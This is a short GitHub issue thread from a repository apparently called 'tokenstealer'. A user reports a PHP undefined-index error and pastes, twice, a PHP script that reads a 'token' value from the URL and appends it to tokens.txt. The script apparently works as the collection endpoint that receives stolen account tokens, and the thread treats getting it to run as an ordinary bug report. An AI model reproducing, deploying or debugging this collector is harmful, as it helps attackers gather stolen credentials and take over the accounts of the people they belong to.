### ISSUE TITLE
Bug

### ISSUE THREAD

**Issue by iraizo** [romangraef/tokenstealer#5]
#4 same problem, got the error : `Undefined index: token in /home/raizgemj/public_html/1337/index.php on line 2
`

**Comment by lucsoft** [comment]
bad bug report show code

Duplicate of #4

**Comment by iraizo** [comment]
<?php
file_put_contents('tokens.txt', $_GET['token'] . PHP_EOL, FILE_APPEND | LOCK_EX);
echo "uwu";
?>

**Comment by iraizo** [comment]
`<?php
file_put_contents('tokens.txt', $_GET['token'] . PHP_EOL, FILE_APPEND | LOCK_EX);
echo "uwu";
?>
`
